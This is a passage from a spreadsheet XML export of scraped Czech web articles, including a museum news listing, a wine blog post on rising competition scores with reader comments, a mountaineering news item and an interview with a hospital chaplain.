zahraničními muzejními institucemi v Mongolsku a na Taiwanu představí v březnu příštího roku návštěvníkům výstavu Čingischán, kterou v září vystřídá výstava 100 předmětů, 100 příběhů z Národního palácového muzea. V Praze tak budou po celý rok vystaveny naprosto jedinečné předměty světového kulturního dědictví. 24. červen 2024 | Národní muzeum Národní muzeum a Česká televize zvou děti na Den s Déčkem v muzeu Národní muzeum miluje děti. Společně s Českou televizí připravilo na sobotu 8. června den pro rodiny s dětmi plný her, zábavy, tvoření a objevování. Známé pohádkové postavy z vysílání stanice Déčko, jako je ptáček Duháček, Jů a Hele, králíci z klobouku, Večerníček a další provedou dětské návštěvníky tvořivými dílnami, expozicemi Historické budovy a Dětským muzeem. Vstup pro děti a jejich doprovod je na akci v rámci muzejní hry zdarma. 4. červen 2024 | Národní muzeum Národní památník na Vítkově se stal součástí Vojenského historického ústavu Národní památník na Vítkově , který byl od roku 2000 součástí Národního muzea , přechází od 1. června 2024 do rukou Ministerstva obrany. Jeho převzetí a spojení s komplexem budov Vojenského historického ústavu Praha tak umožní jeho užívání jako původně zamýšleného symbolu demokratického státu a památníku těch, kteří za něj položili své životy. Až do konce srpna letošního roku zůstanou pro veřejnost v památníku otevřeny expozice a výstavy Národního muzea . 4. červen 2024 | Národní muzeum Více než 100 tisíc návštěvníků si v Národním muzeu nenechalo ujít unikátní výstavu Baroko v Bavorsku a v Čechách Právě dnes, kdy Historickou budovu opouští poslední exponáty, se Národní muzeum rozloučilo s velmi úspěšným výstavním projektem Baroko v Bavorsku a v Čechách . Unikátní skvosty z období 100 let 17. a 18. století si v době od 8. prosince do 8. května přišlo prohlédnout 103 295 návštěvníků, včetně žáků a studentů v rámci školních programů. I do budoucna chystá Národní muzeum velké výstavní projekty mezinárodního významu. 31. květen 2024 | Národní muzeum České primadony v Met opeře . Národní muzeum představuje v New Yorku světové úspěchy českých operních pěvkyň V rámci Roku české hudby připravilo Národní muzeum pro milovníky opery projekt, v němž představuje umění a úspěchy českých operních pěvkyň v zahraničí. Ve spolupráci s Českým centrem a Metropolitní operou v New Yorku otevřelo 22. května zbrusu novou výstavu s názvem České primadony v Met opeře. Nejen prostřednictvím unikátních divadelních kostýmů ze sbírek Národního muzea a Metropolitní opery uvádí výstava slavné české pěvkyně od počátku 20. století až po současnost, které během své kariéry vystupovaly v jednom z nejprestižnějších světových operních domů, Metropolitní opeře v New Yorku , a mnohdy se zde zasloužily o provedení významných českých oper. 23. květen 2024</t>
  </si>
  <si>
    <t>333</t>
  </si>
  <si>
    <t>20241101_602_3241323363_89b41af70a09df5e97e1.html</t>
  </si>
  <si>
    <t>89b41af70a09df5e97e1</t>
  </si>
  <si>
    <t>Zvedá se výrazně kvalita vín, nebo se jen jinak hodnotí?</t>
  </si>
  <si>
    <t>Zvedá se výrazně kvalita vín, nebo se jen jinak hodnotí? 31. 10. 2024 Ve vínoblogu sdílí milovníci vín své osobní zážitky s vínem . Články neprocházejí korekturou a jejich obsah nevyjadřuje názory redakce. Navštívili jste akci s tuzemskými víny, o které byste chtěli dát vědět ostatním? Pošlete nám text nebo fotky v dobré kvalitě s vaším komentářem na adresu redakce mojelahve.cz a my je umístíme do vínoblogu. Nelze vyvrátit, že kvalita tuzemských vín od začátku milénia výrazně stoupla. Bodová hodnocení ze soutěží či v publikacích v posledních letech viditelně stoupají, ale některé „skoky" už ani pouhá zvyšující se kvalita nemůže vysvětlit. Tím spíše, že to není jen případ tuzemských vín. Pomůcka, nikoliv dogma Než se hlouběji ponoříme do zkoumání vývoje hodnocení, je potřeba zopakovat, že jakékoliv bodové hodnocení nám může být pouhou referencí, ale dokud víno sami neochutnáme, nelze se jím za každou cenu řídit. Vzniká v různém prostředí, za různých podmínek a je udělováno různými individuálními hodnotiteli. A zatímco na slovním popisu vín se ještě degustátoři shodnout mohou, bodové hodnocení je vždy do určité míry subjektivní záležitostí a dílem daného okamžiku, ať se snaží tvůrci hodnoticích systémů sebevíc. Je také pravdou, že hodnocení „pitvají" zpravidla jen zkušení vínomilci. Těm laičtějším je někdy těžké už jenom vysvětlit princip stobodové tabulky. Už u něj se můžete zaseknout v tom, že se používá prakticky jen dvacetibodové rozpětí, nebo že je podstatnější tříbodový rozdíl mezi vínem 87 a 90 bodů než 80 a 83 bodů. Pro ně je důležitější jen výsledné číslo a ačkoliv si pod ním neumí nic představit, uvažují v jednoduchém principu „čím více, tím lépe". Všichni chtějí vyšší body Tento jednoduchý princip pochopitelně razí i soutěže či publikace. Vinaři také samozřejmě očekávají od soutěží co nejlepší hodnocení a co nejvíce medailí a neváhají si pro svou účast vybírat právě takové, které jim ty vysoké body dávají. A protože na účasti vinařů jsou pořadatelé soutěží závislí, vytváří tlak na hodnotitele, aby vína na soutěži hodnotili dostatečně vysoko. Tento tlak je všudypřítomný, začíná na školení degustátorů trefnou připomínkou, že „body nedáváte ze svého" a pokračuje rozšiřujícími se vlastními zkušenostmi s tím, jak se obecně boduje. Jedním z důvodů, proč používat stobodové hodnocení, je totiž jeho poměřitelnost. Proto by nemělo devadesátibodové víno na výstavě v Horní dolní být o nic horší než to, které stejné body získalo v Národní soutěži vín. To, že je taková snaha i kvůli různému vzdělání a zkušenostem samotných hodnotitelů nereálná (a další vlivy jsem naznačil v prvním odstavci), neznamená, že se porotci nemají snažit „vzájemně kalibrovat" co nejvíce. Trend přichází zvenku Nelze také pominout, že trend udělování čím dál vyšších hodnocení není výlučnou záležitostí České republiky , spíše naopak. Tuzemští hodnotitelé stále více „pokulhávají" za světem. Už dávno Decanter rozdává vysoké devadesátky, už pár let rakouský průvodce Falstaff přešel ve Wachau z filozofie „Smaragd pod 90 bodů je téměř ostuda" na „Federspiel pod 90 bodů je anomálie". Nemůžeme se pak divit, že tuzemští vinaři se obracejí na zahraniční soutěže a kritiky, aby jejich vína ohodnotili. A že tuzemští pořadatelé a vydavatelé nechtějí vytvářet dojem, že jsou naše vína o tolik horší než ta zahraniční, která přicházejí na trh s vysokým hodnocením. Nejde tedy jen o růst kvality, jde o posuny v hodnocení a interpretaci výsledků stobodové tabulky. Přitom je zvláštní, že ta oficiální se za tu dobu změnila jen velmi kosmeticky. Kdybyste ji vyplnili odshora dolů známkami za „dobré", konečný součet by byl 72 bodů! V dnešním chápání je takové víno naprosto nepitelné. Například přední vinařský kritik James Suckling využívá pro dobré víno rozpětí 88 – 90 bodů, pod 88 bodů jej klasifikuje jako „nedoporučené". Minulost nás usvědčuje V testu Prague Wine Trophy 2009 se nejlepší Pinot noir (Gevrey Chambertin 2004 Jean &amp;amp; Jean -Louis Trapet) nepřehoupnul přes 90 bodů, některé Premier a Grand Cru zůstaly u pětaosmdesáti a níže. Loňský Průvodce nejlepšími víny 2023-2024 v přehledu nejlepších vín za deset ročníků své existence uvedl mezi 48 víny hned 33 z posledních dvou ročníků publikace. Těžko uvěřit, že by se dělala v tak krátkém rozmezí vína o tolik lepší, jen se zkrátka obecně zvedlo bodové hodnocení. Sám na sobě vidím vývoj, když jsem s hodnocením úplně začínal, neměl jsem problém dávat vínům 80 a méně bodů. Dokonce si pamatuji i slova Tomáše Čačíka v blahé paměti, který také tvrdil, že „80 bodů je ještě pořád dobré víno". Uvědomuji si, že ty doby jsou definitivně pryč a pokud bych alespoň částečně nešel s trendem, mohu vinaře poškozovat. Není to úplně jejich chyba, že očekávají téměř automaticky vysoké hodnocení, hráze se dávno protrhly v zahraničí. Na hodnocení nerezignujte Nebudu před tímto trendem nějak výrazně varovat, i když je zřejmé, že musí narazit na strop. A ještě dříve může hodnocení ztrácet relevanci. Není to ale důvodem na něj rezignovat. Naopak pro nás všechny více či méně amatérské hodnotitele je to ještě větší impulz se vyvíjet, vzdělávat a poznávat svět vín a pokoušet se porozumět jejich hodnocení. Třeba časem zjistíme, že jsme na tuzemská vína zbytečně přísní a zaslouží si vyšší body. A když se pak všeobecný trend zase možná jednou obrátí, sejdeme se všichni v ideální bodové hladině ;-) Použité zdroje: Bonovino.cz. (n. d.) Bodová hodnocení vín https://www.bonovino.cz/bodova-hodnoceni/ Shopping Guide Prague Wine Trophy (2009). Příloha časopisu Víno Revue, 2009 (červenec) Šetka, I., Dvořák, I., Přibyl, J., Novotný, R.,&amp;amp; Süss, R. (2023). Nejlepší vína České republiky : Průvodce 2023-2024. Yacht, s. r. o. -Vicky- 4. 11. 2024 12:40 Wiki: Moc hezky sepsáno, Vicky! Taky si tento trend uvědomuji a sama ho na svém hodnocení poslední dobou trochu pociťuji. Přisuzovala jsem to však spíš tomu, jako bych na začátku svých hodnocení čekala na ty bomby a držela si pro ně rezervu. 😀 Nicméně za těch pár let jsem měla možnost ochutnat nemálo topových světových vín a dospěla jsem k názoru, že jsem držela asi zbytečně velkou rezervu. 😀 Zpětně si tedy uvědomuji, že jsem na některá tuzemská vína byla opravdu trochu přísná. 😊 Tebou popsaný tlak na soutěžích je určitě realitou a celkový světový trend také. I já si tu pověstnou větu “však ty body nedáváš ze svého” na soutěži vyslechla... 😆 Ano, je potřeba hodně srovnávat. Nejen se zahraničím, kde člověk zjistí, že průměrná kvalita není nijak odlišná, ale také s tuzemskem. Když se vínomilec projde po otevřených sklepech v některé z moravských vísek, zjistí, že pokud by si měl stále zachovávat svůj přísný metr, tak by tam devadesátkové víno těžko hledal a naopak se mu nahromadí vína pod 80 body. Proto musí zvednout ten "základ", většina vín se opravdu kolem 80 bodů pohybuje, ale tím pádem také musí dát velmi pěknému vínu více než 85. -Vicky- 4. 11. 2024 12:36 slecnasteckou: Jsem moc ráda, že to tu zaznělo... hodnotitelé na soutěžích jsou opravdu zvyklí dávat vyšší body a v této optice je i potřeba naše hodnocení porovnávat; není to ani dobře, ani špatně - prostě to tak je ;-)... zaplatila jsem si Master Class se světoznámým Jamesem Sucklingem a z jeho vysokých bodů se mi protáčely panenky.:) Zrovna on je myslím světový extrém, u něj tipujeme, kdy se dostane nad 100 bodů:-D Je tím inspirována i úvodní grafika...:-) -Vicky- 4. 11. 2024 12:34 Tycka: Asi je to tak, že většina zdejších vínomilců, včetně mě, se pohybujeme většinou pouze mezi 80 až 90b., tudíž by nám stačila 10-ti bodová stupnice...:-) Problém možná tkví v tom, že nikdo z nás neví jak chutná 100 bodové víno a proto se držíme při zemi...:-) Mám to obdobně jako Brodequin, kdy 85b. je "magických", tzn. že nad 85b. bych si láhev opakovaně koupil.... Ano, tu hranici máme každý nějak nastavenou, stejně jako rozsah. Já třeba dávám velmi malému počtu vín známku pod 80, většinou "z lítosti" alespoň tu kulatou 80 dostanou. Myslím, že pod 80 už by člověk musel výrazně obhájit, že zrovna tohle víno si ani tolik nezaslouží. Mimochodem se to stalo letos na velkopavlovické podoblasti, kde skončily dva medailové Tramíny z našeho testu pod touto hranicí a neprobojovaly se do dalšího kola (pokud nepůjdou na divokou kartu). A když jsem se tam potkal s jedním degustátorem, který loni hodnotil finálovou stovku Salonu, tak se úplně chytal za hlavu a kupoval si lahev právě toho Tramínu se 78 body... Napadá mě, zda bodová inflace nesouvisí s klesajícím trendem prodeje vína ... A ten skok v bodování byl myslím patrný někdy kolem roku 2021, kdy v Šetkově Průvodci se to najednou začalo hemžit devadesátkami. Když dosáhnou naše vína na světové soutěži vlašáků v Maďarsku na 90 bodů a více, tak s tím asi nemám problém. Ale když "obyčejný" ryzlink ze Znojemska dostane na Decanteru 95b., tak něco není v pořádku. To bych do souvislostí nedával. Jednak ta inflace začala ve světě už mnohem dříve a hlavně ještě v roce 2021 tady žádný trend klesajících prodejů nebyl. Ale už tehdy v tuzemsku sílily hlasy vinařů, že raději budou dávat vína do zahraničních soutěží, kde dostávají vysoké body, než do tuzemska. Protože tady neumí vína porotci "dobře ocenit". -Vicky- 4. 11. 2024 12:24 Tatínek má velké bříško: Jako naprostý laik odkojený zdejším návodem k hodnocením a (právě proto) zanícený "devadesátkář" bych měl asi mlčet. Přesto... je to o systému a statistice. Soubor hodnocení jakéhokoli jednotlivce i skupiny podléhá nějakému statistickému rozdělení. Většinou "normálnímu" rozdělení (Gaussova křivka) danému střední hodnotou a rozptylem. Stobodovka to umožňuje v rozmezí 40-100 bodů, vzhledem k vícenásobné normalizaci se ale hodně hodnotících uchyluje v podstatě k desetibodovému hodnocení 85+/-5 bodů. Tedy zhruba 98% hodnocení leží mezi 80-90 body. Třeba tady. Vede to k absurdním hodnocením typu 87+ bodu. Někteří hodnotitelé s obrovským počtem hodnocení zde nikdy (v životě) nedají víc než 91, 92 nebo 93 bodů, nebo dávají jen jednotky hodnocení pod 80 bodů, například. I Vám, Viktore, zbývá 6 bodů do stovky:) No já samozřejmě všechna hodnocení ve zdejší dtb nemám (např. zahraniční vína ), takže Vám mohu sdělit, že už jsem se propracoval i k 97 ;-) Vidím tady dvojí trend. Jednak ta střední hodnota se posouvá nahoru, protože neustálé zlepšování je mantra udržení spotřebitele. A hodnotitelé (na soutěžích) jdou vstříc hodnoceným. A pak se zvětšuje rozptyl, protože to umožňuje roztáhnout spektrum hodnocení vín přihlášených do soutěží (která by neměla být z principu špatná) na 95-75 bodů místo na 90-80. Od čeho jinak je ve stobodovce 60 volných pozic? Velmi dobře jste pojmenoval dva jevy, které spolu ale vzájemně nesouvisí. Ztímco širší spektrum hodnocení je naprostý základ toho, co se "učí" degustátoři, tak posun spektra je právě ovlivněný trendem, kterým se zabývám v článku. Já to tak dělám a moje hodnocení má extrémy do obou stran. I Michlovský za to myslím brojil. Když to shrnu, myslím že dost lidí (i zde) vyznává takové to konzervativní hodnocení "na Spáčilku". To je filmová kritička, která v 90-00 letech hodnotila filmy zásadně jen 60, 65 nebo 70%. Za mne využít škálu hodnocení v plném rozsahu je dobře, víc nahoru i dolu. Jestli se ale celkově posouvá střední hodnota (průměr), to bez dat neumím posoudit. Nenazval bych to hodnotami konzervativními. Jsou soutěže, kde se do katalogu vína pod 80 bodů nedostanou. Pak další, které vína pod určitou bodovou hranicí vyřazují. Proč? No protože zkrátka v dnešní době už není relevantní, jestli víno dostane 75 nebo 65 bodů. Takovým vínem (a jeho hodnocením) se člověk nepotřebuje zabývat. Relevantní začne být až od určité bodové hranice, která se právě posouvá. James Suckling ji má na 88 bodech... Smysl by si pak asi dávalo, aby si mezinárodní organizace kalibrovala hodnotitele ve stylu, například: "jestliže je v Moravské podoblasti dobrý rok, ale ne výjimečně dobrý rok, pak 4-6% přihlášených vín by měla obdržet známku více než 90 bodů a průměr hodnocení by měl být 84-86 bodů". Když to tak nevyjde, měla by jít instrukce například: "Hodnoťte přísněji, ale s větším rozptylem, protože Váš průměr hodnocení je 86,5 bodů, ale máte málo hodnocení nad 90 bodů". To samozřejmě žádná mezinárodní organizace ani udělat nemůže, protože pokud se hodnotí naslepo, neměl byste vědět, odkud které víno pochází ;-) A obecné instrukce jsou jasné a dodržují se. Wiki 3. 11. 2024 20:25 Moc hezky sepsáno, Vicky! Taky si tento trend uvědomuji a sama ho na svém hodnocení poslední dobou trochu pociťuji. Přisuzovala jsem to však spíš tomu, jako bych na začátku svých hodnocení čekala na ty bomby a držela si pro ně rezervu. 😀 Nicméně za těch pár let jsem měla možnost ochutnat nemálo topových světových vín a dospěla jsem k názoru, že jsem držela asi zbytečně velkou rezervu. 😀 Zpětně si tedy uvědomuji, že jsem na některá tuzemská vína byla opravdu trochu přísná. 😊 Tebou popsaný tlak na soutěžích je určitě realitou a celkový světový trend také. I já si tu pověstnou větu “však ty body nedáváš ze svého” na soutěži vyslechla... 😆 slecnasteckou 3. 11. 2024 18:14 Jsem moc ráda, že to tu zaznělo... hodnotitelé na soutěžích jsou opravdu zvyklí dávat vyšší body a v této optice je i potřeba naše hodnocení porovnávat; není to ani dobře, ani špatně - prostě to tak je ;-)... zaplatila jsem si Master Class se světoznámým Jamesem Sucklingem a z jeho vysokých bodů se mi protáčely panenky.:) Fanoušek na Herohero Asi je to tak, že většina zdejších vínomilců, včetně mě, se pohybujeme většinou pouze mezi 80 až 90b., tudíž by nám stačila 10-ti bodová stupnice...:-) Problém možná tkví v tom, že nikdo z nás neví jak chutná 100 bodové víno a proto se držíme při zemi...:-) Mám to obdobně jako Brodequin, kdy 85b. je "magických", tzn. že nad 85b. bych si láhev opakovaně koupil.... Napadá mě, zda bodová inflace nesouvisí s klesajícím trendem prodeje vína ... A ten skok v bodování byl myslím patrný někdy kolem roku 2021, kdy v Šetkově Průvodci se to najednou začalo hemžit devadesátkami. Když dosáhnou naše vína na světové soutěži vlašáků v Maďarsku na 90 bodů a více, tak s tím asi nemám problém. Ale když "obyčejný" ryzlink ze Znojemska dostane na Decanteru 95b., tak něco není v pořádku. Fanoušek na Herohero Jako naprostý laik odkojený zdejším návodem k hodnocením a (právě proto) zanícený "devadesátkář" bych měl asi mlčet. Přesto... je to o systému a statistice. Soubor hodnocení jakéhokoli jednotlivce i skupiny podléhá nějakému statistickému rozdělení. Většinou "normálnímu" rozdělení (Gaussova křivka) danému střední hodnotou a rozptylem. Stobodovka to umožňuje v rozmezí 40-100 bodů, vzhledem k vícenásobné normalizaci se ale hodně hodnotících uchyluje v podstatě k desetibodovému hodnocení 85+/-5 bodů. Tedy zhruba 98% hodnocení leží mezi 80-90 body. Třeba tady. Vede to k absurdním hodnocením typu 87+ bodu. Někteří hodnotitelé s obrovským počtem hodnocení zde nikdy (v životě) nedají víc než 91, 92 nebo 93 bodů, nebo dávají jen jednotky hodnocení pod 80 bodů, například. I Vám, Viktore, zbývá 6 bodů do stovky:) Vidím tady dvojí trend. Jednak ta střední hodnota se posouvá nahoru, protože neustálé zlepšování je mantra udržení spotřebitele. A hodnotitelé (na soutěžích) jdou vstříc hodnoceným. A pak se zvětšuje rozptyl, protože to umožňuje roztáhnout spektrum hodnocení vín přihlášených do soutěží (která by neměla být z principu špatná) na 95-75 bodů místo na 90-80. Od čeho jinak je ve stobodovce 60 volných pozic? Já to tak dělám a moje hodnocení má extrémy do obou stran. I Michlovský za to myslím brojil. Když to shrnu, myslím že dost lidí (i zde) vyznává takové to konzervativní hodnocení "na Spáčilku". To je filmová kritička, která v 90-00 letech hodnotila filmy zásadně jen 60, 65 nebo 70%. Za mne využít škálu hodnocení v plném rozsahu je dobře, víc nahoru i dolu. Jestli se ale celkově posouvá střední hodnota (průměr), to bez dat neumím posoudit. Smysl by si pak asi dávalo, aby si mezinárodní organizace kalibrovala hodnotitele ve stylu, například: "jestliže je v Moravské podoblasti dobrý rok, ale ne výjimečně dobrý rok, pak 4-6% přihlášených vín by měla obdržet známku více než 90 bodů a průměr hodnocení by měl být 84-86 bodů". Když to tak nevyjde, měla by jít instrukce například: "Hodnoťte přísněji, ale s větším rozptylem, protože Váš průměr hodnocení je 86,5 bodů, ale máte málo hodnocení nad 90 bodů". Autor: MojeLahve.cz Rubrika transition_slide Jídlo a pití</t>
  </si>
  <si>
    <t>20241101_603_3241095055_6750e21654e247c7f61a.html</t>
  </si>
  <si>
    <t>6750e21654e247c7f61a</t>
  </si>
  <si>
    <t>„V 11 hodin jsme stáli na vrcholu“</t>
  </si>
  <si>
    <t>„V 11 hodin jsme stáli na vrcholu“ Horolezci se těšili také na pivo . Jeden z nejúspěšnějších českých horolezců současnosti Marek Holeček se Slovákem Ondrejem Húserkou vylezli prvovýstupem východní stěnou na vrchol himálajské sedmitisícovky Langtang Lirung. „V 11.00 jsme stáli na vrcholu. Východní děsivá 2,5 kilometrová stěna Langtangu Lirungu je po pěti a půl dnech prostoupena. Sestupujeme dolů, do údolí a těšíme se na všechny a na pívo ,“ napsal brzy 50letý Holeček , první český držitel prestižní mezinárodní ceny Zlatý cepín. Hora Langtang Lirung leží ve výšce 7234 metrů nad mořem na hranici mezi Nepálem a Čínou . Do exponované a velmi obtížné stěny vyrazili Holeček s Húserkou poprvé 19. října, ale zastavil je déšť a laviny. Na vhodné počasí čekali několik dnů, až do pátku. V úterý se vrcholu přiblížili. „Včerejší den se dá popsat jedním slovem jako peklo. Celý den jsme se prokopávali sypkým cukrem na vrcholový hřeben. Vpodvečer jsme úplně hotoví postavili pod vrškem pátý bivak. Ráno mu snad dáme babu a mažeme dolů,“ informovali ze satelitního telefonu ve středu. O den později se jim prvovýstup podařil. Holeček rád objevuje nové cesty, leze od pěti let. Padesátiny oslaví 5. listopadu. ČTK</t>
  </si>
  <si>
    <t>302570</t>
  </si>
  <si>
    <t>20241101_604_3241069627_962e92d5d09f0ba8e736.html</t>
  </si>
  <si>
    <t>962e92d5d09f0ba8e736</t>
  </si>
  <si>
    <t>Kaplan: Na některé věci by ani zdravotník neměl zůstat sám</t>
  </si>
  <si>
    <t>Kaplan: Na některé věci by ani zdravotník neměl zůstat sám Jenom jsem se před sestřičkou z Ústřední vojenské nemocnice v pražských Střešovicích zmínil o Pavlu Rumlovi , vyslechl jsem proud vzpomínek na nezapomenutelného duchovního. Člověk, který jako vojenský kaplan prožil i válku proti Saddámu Husajnovi a další vojenské mise, slouží od března 2024 v pražské Všeobecné fakultní nemocnici . Svěřují se lidé s hříchy nebo s tím, co za hřích považují? Až sedmdesát procent mých pacientů jsou takzvaní „nevěřící“. To je termín, který používám kvůli čtenářům, ale s jako takovým s ním nesouhlasím, je nepřesný. V našem prostředí potkáte buď křesťana, žida, buddhistu či muslima, nebo člověka, který nepraktikuje žádné náboženství; ale ani on není nevěřící. To znamená, že nepotřebuje praktikovat nějaké náboženství a s ním spojené termíny, jakým je třeba slovo hřích. Stejně, vyzpovídávají se? Jasně že ano. Pobyt na nemocničním lůžku přináší konfrontaci se sebou samotným, s mojí minulostí, s mým životem. A čas přemýšlet! Takže si umí každý z nás představit, že v našem životě jsou věci nádherné, o kterých nepřemýšlíme, ale radostně na ně vzpomínáme. Jsou tu ale i propady či stíny, které z hlavy či srdce nevymažete. Zamýšlení se nad nimi někdy opravdu bolí, probouzí lítost či výčitky. Vnímají tady víc pojem konečnosti? Ano. I když nás zrovna nic neohrožuje, v dnešní civilizaci vnímáme konečnost života stále kolem sebe. V nemocnici záleží na oddělení, kam se člověk se svou diagnózou dostane. Stačí jen vidět bolest, a ta je na každém oddělení. Slyšel jsem názor, že je lepší, když zemře starý člověk, než dítě? Co vy na to? Je to tak. Smrt je přirozenou součástí našeho bytí a má přijít po zralém a dobrém životě. Škála nemocí, i těch psychických, je mezi mladou generací a mezi dětmi zvláště po covidu tak alarmující, že i počet dětských úmrtí roste. To se těžko snáší. Neodsunujeme přece jen stále umírání i bolest od sebe k lékařům, do nemocnic? Přání nás odcházejících je být mezi svými, být doma, tohle se nemění. Touha nebýt na své umírání sám. Voláme „mami“! Pokud jde o českou společnost, jsme stále na začátku bolestného procesu, kdy se znovu učíme existovat „pod zorným úhlem věčnosti“. Říkám tomu ztracený selský rozum. Do určité doby smrt, umírání, péče o zesnulé tělo byly přirozenou součástí života. Narození i smrt se odehrávaly v jedné místnosti. Toto jsme ztratili a musíme se to učit. Je to poznat například na rostoucím počtu paliativních týmů. V nemocnicích i v zařízeních k tomu určených, v hospicích. Přes paliativu a hospice se vracíme k realitě přijmout smrt. Umět umřít, pečovat o umírajícího a poté i o jeho tělo. Mluvil jste o potížích mladých. Patří k nim strach z umírání, být u „toho“? I sami rodiče je od toho blokují a dítě se pak sesype z čehokoli. Naprosto souhlasím. Základní příčinou je, že naše civilizace zpohodlněla a je stále měkčí a měkčí. To je vidět v porovnání s národy, které nežijí v takovém luxusu jako my. Já jsem přes sport, takže i zde se porovnání nabízí. Jsme změkčilí. Bohužel. Aby něco nezabolelo naše citlivé děti, tam jim zakryjeme oči. Tam se nedívej. Malíř Jakub Schikaneder namaloval nádherný obraz Vražda v domě. Na dvoře leží mrtvá dívka, obyvatelé domu stojí kolem ní a všichni se na ni s hrůzou dívají. Je tam i holčička, která zvědavě nahlíží, nikdo jí nezakrývá oči. To je správný přístup. Zmiňoval jste se o sportu. Sportoval jsem celý život, hrál volejbal, pak jsem se stal vojákem. V armádě bylo super, že jsme měli povinnost sportovat i v pracovní době. Hráli jsme florbal, fotbal a další. V minulé armádě, před rokem 1989, vojáci z povolání většinou tělocvik nesnášeli, v té profesionální už vládla a vládne soutěživost. Já měl to štěstí, že jsem nastoupil na 4. brigádu rychlého nasazení, nosili jsme červené barety, byli jsme elita! Achtěli to dávat najevo! Ne z donucení, my chtěli. „Tam, kde jiní nestačí“ je heslo této brigády. Fotbal hodně zblízka jsem na stará kolena zažíval osm let jako trenér malých kluků na Dukle . Měl jsem fotbalisty jedenácti až patnáctileté. To bylo báječné. Upřímně. Komu fandíte? Jsem rodilý sparťan. Nezvolil jsem si to. Starší brácha měl Duklu a na mě zbyla Sparta . Říkám zbyla, protože to byla šedesátá léta a tehdy byla Dukla na vrcholu v Evropě i ve světě. Když jsem se pak dostal do úvéenky (Ústřední vojenská nemocnice v Praze - Střešovicích – pozn. autora), tam jsem potkával řadu fotbalistů, reprezentantů. Tehdy jsem všem říkal, že já budu prvním kaplanem ve Spartě . Tehdy Sparta neměla „ducha“, byla zralá na duchovní péči. Sranda, sranda. Potkal jsem se s trenérem Brücknerem, on že je to blbost, že u nás není taková tradice. Ale třeba ve Skotsku mají v kabině na stěně modlitbu – abych přiznal čest soupeři. Tak vidíte, jako sparťan jsem se ocitl na Dukle . I jako sparťan ale musím uznat, a vy jistě taky, že stadion Dukly , Juliska , to je chrám! Když tam ještě nebyla tribuna, sedávali jsme na stráni na dece a čučeli na fotbal, fotbalisty století Masopusta (držitel Zlatého míče), Kvašňáka (Sparťan století)… Je s pacienty někdy i sranda? Je. Mám nezapomenutelnou návštěvu, ještě z ÚVN. Přišel jsem za pánem a on povídá: „Nechal jsem si vás pozvat ze zvědavosti.“ Takže jsem si říkal, o čem se budeme bavit. No, seděli jsme nakonec hodinu a řeč šla o fotbale. Byla to poctivě odpracovaná duchovní péče. Kolik máte času, abyste odhadl pacientovu povahu? Není na to časová norma. Jsem u někoho třeba jen tři minuty, odcházím a on pláče, nebo se směje. V obou případech to byla dobrá návštěva. Někde můžu být třičtvrtěhodinu a mám z toho špatný pocit, protože se mi to nepovedlo. Úspěch kaplanské práce je v tom, že člověka rozmluvíme. Ale někdy musíme i my. Když je pacient méně komunikativní. I tak se stane, že vypustíte větu, která neměla zaznít. Stalo se mi, že jsem se na něco zeptal, a nedošlo mi, že jsem se podobně ptal už čtvrt hodiny předtím, a tím jsem projevil ne úplné soustředění. Že jsem to zapomněl. Ta chyba mě dlouho mrzela. Jaké je věkové rozpětí lidí, kteří si vás žádají? V ÚVN nebyly děti. Často vojáci, v mladším věku, než jsem já. Tady ve Všeobecné fakultní nemocnici děti jsou, ale zatím se s jejich prostředím seznamuji. Už jen z názvů některých dětských oddělení mi jde mráz po zádech. Přitom jsem s dětmi celý život pracoval, mám děti i vnoučky, ale až nadejde chvíle, kdy přijdu v nemocnici k dětskému lůžku… V motolské nemocnici je řada kaplanů, někteří pracují pravidelně s dětmi. Ale berte v úvahu, že v nemocnici nejsem sám voják v poli, patřím do týmu, mám se s kým sdílet. S psychologem, sociálním pracovníkem, psychoterapeutem, se sestrami. Je lepší, aby kaplan chodil v nemocničním oděvu, nebo v civilu? Přišel jsem na to, že je fér chodit v bílém, jsem součástí týmu. Potkal jsem v nemocnici faráře, který byl v „pracovním“, v kolárku, a viděl jsem, jak k sobě přitahuje pozornost, ale i úctu. O tuto úctu přicházím ve chvíli, kdy navlíknu bílý plášť a kalhoty. Má to úskalí, protože jdete po chodbě a lidé se na vás obracejí o radu, říkají mi pane doktore, protože si nevšimnou malého křížku na košili. Takže ale sklízím jinou úctu, vizuálně jsem lékař. A lékařům rád říkám, že v našich pacientských očích jsou pánembohem, stvořitelem, zachráncem. Někdy je pro mě těžké vydržet ty pohledy vystrašených pacientů, kteří čekají před ambulancemi a mají mě za doktora. Někdy jdu jinou chodbou. Ale vždy se představuji, nedochází k mýlce. A nade vše, nemocniční úbor splňuje přísná kritéria na hygienu, a to je dobře! Jak ze zbavíte množství těžkých osudů? Jak nebýt cynik? Je mnoho způsobů, jak se udržovat. Profesně užíváme supervizi, skvělý nástroj, díky němuž lze řešit pracovní problémy. Hodně si mezi sebou jako personál povídáme, sdělená bolest je poloviční. Ale k mé „hygieně“ patří i sport, zajít si na pivo , naštípat dříví. Váš kolega na psychiatrii říkal, že víc než pro pacienty je tu pro lékaře a sestry. Jsem v této nemocnici od března a mohu potvrdit, že pracovníci nemocnice si ke mně nacházejí cestu, byť mě ještě neznají. Kdysi jsem byl na praxi ve vojenské nemocnici v německém Koblenzu u evangelické kaplanky, která tam sloužila sedmnáct let. Říkala: „Počítej s tím, že začneš u pacientů a skončíš upersonálu.“ Je to tak. Zažijete, že se vám pověsí na krk sestra a s pláčem říká: „Právě jsme odpojili pacienta.“ Kaplan slouží také svojí přítomností, má být v pravou chvíli na pravém místě. Není samozřejmě výsadou jen kaplanů pomáhat personálu. Ale je jasné, že práce zdravotníků je tak těžká, že na některé situace by zdravotník skutečně neměl být sám. Profesi kaplana v případě podplukovníka v záloze Pavla Rumla prozrazuje jen malý zlatý křížek na nemocničním oblečení. METRO Autor: PAVEL HRABICA Autor Pavel Hrabica</t>
  </si>
  <si>
    <t>20241101_605_3241366300_d38ee3c98d7d1ce5dc87.html</t>
  </si>
  <si>
    <t>d38ee3c98d7d1ce5dc87</t>
  </si>
  <si>
    <t>Závod o čas: dupnout na brzdu v sanitce nejde</t>
  </si>
  <si>
